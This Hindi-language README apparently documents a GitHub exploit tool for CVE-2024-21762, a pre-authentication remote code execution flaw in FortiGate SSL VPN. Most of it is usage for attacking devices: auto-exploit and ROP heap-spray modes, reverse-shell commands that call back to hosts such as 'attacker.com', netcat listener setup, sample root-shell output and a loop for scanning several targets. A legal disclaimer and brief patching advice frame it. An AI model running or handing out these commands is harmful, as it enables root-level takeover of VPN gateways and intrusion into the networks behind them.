
CVE-2024-21762 का पता लगाता है और FortiGate SSL VPN में प्री-ऑथेंटिकेशन RCE का शोषण करता है, जिसमें बेसलाइन सत्यापन, स्वचालित शोषण, ROP हीप-स्प्रे मोड और रिवर्स शेल शामिल हैं।
CVE-2024-21762 के लिए पहचान और शोषण उपकरण - FortiGate SSL VPN में गंभीर भेद्यता
⚠️ कानूनी चेतावनी: यह उपकरण केवल अधिकृत परीक्षण वातावरण के लिए है। अनधिकृत उपयोग अवैध है और गंभीर कानूनी परिणामों का कारण बन सकता है।
CVE-2024-21762 FortiGate SSL VPN घटकों में एक गंभीर भेद्यता है जो प्रमाणीकरण-पूर्व दूरस्थ कोड निष्पादन (RCE) की अनुमति देती है। यह दोष Transfer-Encoding chunked के साथ HTTP अनुरोधों के संवेदनशील पार्सिंग में मौजूद है, जिसके परिणामस्वरूप sslvpnd घटक में out-of-bounds write होता है।
| गुण | जानकारी |
|---|---|
| CVE ID | CVE-2024-21762 |
| भेद्यता | sslvpnd में out-of-bounds write |
| प्रकार | प्रमाणीकरण-पूर्व दूरस्थ कोड निष्पादन (RCE) |
| CVSS स्कोर | 9.8 (गंभीर) |
| प्रभावित घटक | FortiOS SSL VPN |
| संवेदनशील संस्करण | 7.0.0-7.0.13, 7.2.0-7.2.6, 7.4.0-7.4.2 |
✅ भेद्यता का पता लगाना - दोषपूर्ण अनुरोधों के माध्यम से संवेदनशील FortiGate की पहचान
✅ बेसलाइन परीक्षण - परीक्षणों से पहले सर्वर के सामान्य व्यवहार की जाँच
✅ स्वचालित मोड - स्वचालित रूप से भेद्यता का पता लगाएं और शोषण करें
✅ रिवर्स शेल - आईपी/पोर्ट कॉन्फ़िगरेशन के साथ bash रिवर्स शेल का समर्थन
✅ इनपुट सत्यापन - शोषण से पहले आईपी और पोर्ट को मान्य करें
✅ विस्तृत रिपोर्ट - सुधार अनुशंसाओं के साथ रिपोर्ट तैयार करें
✅ मजबूत त्रुटि प्रबंधन - कनेक्शन और अपवादों का सुरक्षित प्रबंधन
# रिपॉजिटरी क्लोन करें
git clone https://github.com/your-username/CVE-2024-21762.git
cd CVE-2024-21762
# सिंटैक्स जांचें
python -m py_compile EXPLOIT.py
# स्क्रिप्ट चलाएं
python EXPLOIT.py -h
# सरल पहचान परीक्षण
python EXPLOIT.py 192.168.1.100
# कस्टम पोर्ट के साथ
python EXPLOIT.py 192.168.1.100 -p 8443
# बढ़ी हुई टाइमआउट के साथ
python EXPLOIT.py 192.168.1.100 --timeout 20
# पूर्व-कॉन्फ़िगर्ड रिवर्स शेल के साथ स्वचालित मोड
python EXPLOIT.py 192.168.1.100 --auto -li 10.0.0.5 -lp 4444
# बिना क्रेडेंशियल के स्वचालित मोड (संवादात्मक रूप से पूछता है)
python EXPLOIT.py 192.168.1.100 --auto
ROP मोड विशिष्ट लक्ष्यों (FortiOS 7.4.2) के लिए हीप स्प्रे के साथ दो-चरणीय शोषण लागू करता है:
# Node.js रिवर्स शेल के साथ ROP शोषण
python EXPLOIT.py 192.168.1.100 --rop -li 10.0.0.5 -lp 4242
# कस्टम पोर्ट के साथ
python EXPLOIT.py 192.168.1.100 -p 8443 --rop -li attacker.com -lp 4242
# धीमे लक्ष्यों के लिए बढ़ी हुई टाइमआउट के साथ
python EXPLOIT.py 192.168.1.100 --rop -li 192.168.1.50 -lp 9999 --timeout 30
ROP शोषण प्रवाह:
अपने सुनने वाले सर्वर पर:
# Linux/Mac/Windows netcat के साथ
nc -lnvp 4242
# अपेक्षित आउटपुट:
# listening on [any] 4242 ...
# connect to [10.0.0.5] from (UNKNOWN) [192.168.1.100] 54321
# id
# uid=0(root) gid=0(root) groups=0(root)
⚠️ महत्वपूर्ण नोट: ROP मोड FortiOS 7.4.2.F-build2571 के लिए अनुकूलित है। ROP श्रृंखला के हार्डकोडेड ऑफ़सेट के कारण अन्य संस्करण काम नहीं कर सकते हैं।
# रिवर्स शेल पेलोड भेजें
python EXPLOIT.py 192.168.1.100 -li 192.168.1.50 -lp 9999
# एकाधिक विकल्पों का संयोजन
python EXPLOIT.py -t target.com -p 8443 --auto -li attacker.com -lp 5555 --timeout 15
positional arguments:
target परीक्षण किया जाने वाला लक्ष्य होस्टनाम या आईपी
optional arguments:
-h, --help यह सहायता संदेश दिखाएं
-t, --target HOSTNAME लक्ष्य होस्टनाम या आईपी (वैकल्पिक)
-p, --port PORT SSL VPN पोर्ट (डिफ़ॉल्ट: 443)
--timeout SECONDS टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
-li, --lhost IP रिवर्स शेल प्राप्त करने के लिए स्थानीय आईपी
-lp, --lport PORT रिवर्स शेल प्राप्त करने के लिए स्थानीय पोर्ट
--no-baseline बेसलाइन परीक्षण छोड़ें
--auto स्वचालित मोड: पता लगाएं और शोषण करें
--rop ROP मोड: हीप स्प्रे के साथ उन्नत शोषण (FortiOS 7.4.2)
-v, --version स्क्रिप्ट संस्करण दिखाएं
python EXPLOIT.py 192.168.1.100
भेद्यता के मामले में अपेक्षित परिणाम:
[+] भेद्यता परीक्षण शुरू हो रहा है...
[!] संवेदनशील पाया गया!
[!] सर्वर ने कनेक्शन अचानक समाप्त कर दिया
[!] स्थिति: संवेदनशील
python EXPLOIT.py 192.168.1.100 --auto -li 192.168.1.50 -lp 4444
अपने सर्वर पर:
# Linux/Mac
nc -lnvp 4444
# Windows
ncat -lnvp 4444
for target in 192.168.1.100 192.168.1.101 192.168.1.102; do
python EXPLOIT.py $target --timeout 15
done
उपकरण एक लक्ष्य को संवेदनशील मानता है जब निम्नलिखित व्यवहारों में से एक का पता चलता है:
| संस्करण | पहचान | ROP मोड | स्थिति |
|---|---|---|---|
| FortiOS 7.0.0 - 7.0.13 | ✅ हाँ | ❌ नहीं | ⚠️ संवेदनशील |
| FortiOS 7.2.0 - 7.2.6 | ✅ हाँ | ❌ नहीं | ⚠️ संवेदनशील |
| FortiOS 7.4.0 - 7.4.1 | ✅ हाँ | ❌ नहीं | ⚠️ संवेदनशील |
| FortiOS 7.4.2 (build≤2571) | ✅ हाँ | ✅ हाँ | ⚠️ संवेदनशील |
| FortiOS 7.4.3+ | ❌ नहीं | ❌ नहीं | ✅ सुधारित |
FortiOS को सुधारित संस्करण में अपडेट करें:
अस्थायी अलगाव
निगरानी
# FortiOS संस्करण जांचें
python EXPLOIT.py your-fortinet.com
यदि परिणाम "संवेदनशील नहीं" दिखाता है, तो पैच सफलतापूर्वक लागू हो गया है।
CVE-2024-21762/
├── EXPLOIT.py # मुख्य शोषण स्क्रिप्ट
├── README.md # यह फ़ाइल
├── LICENSE # MIT लाइसेंस
└── .gitignore # Git कॉन्फ़िगरेशन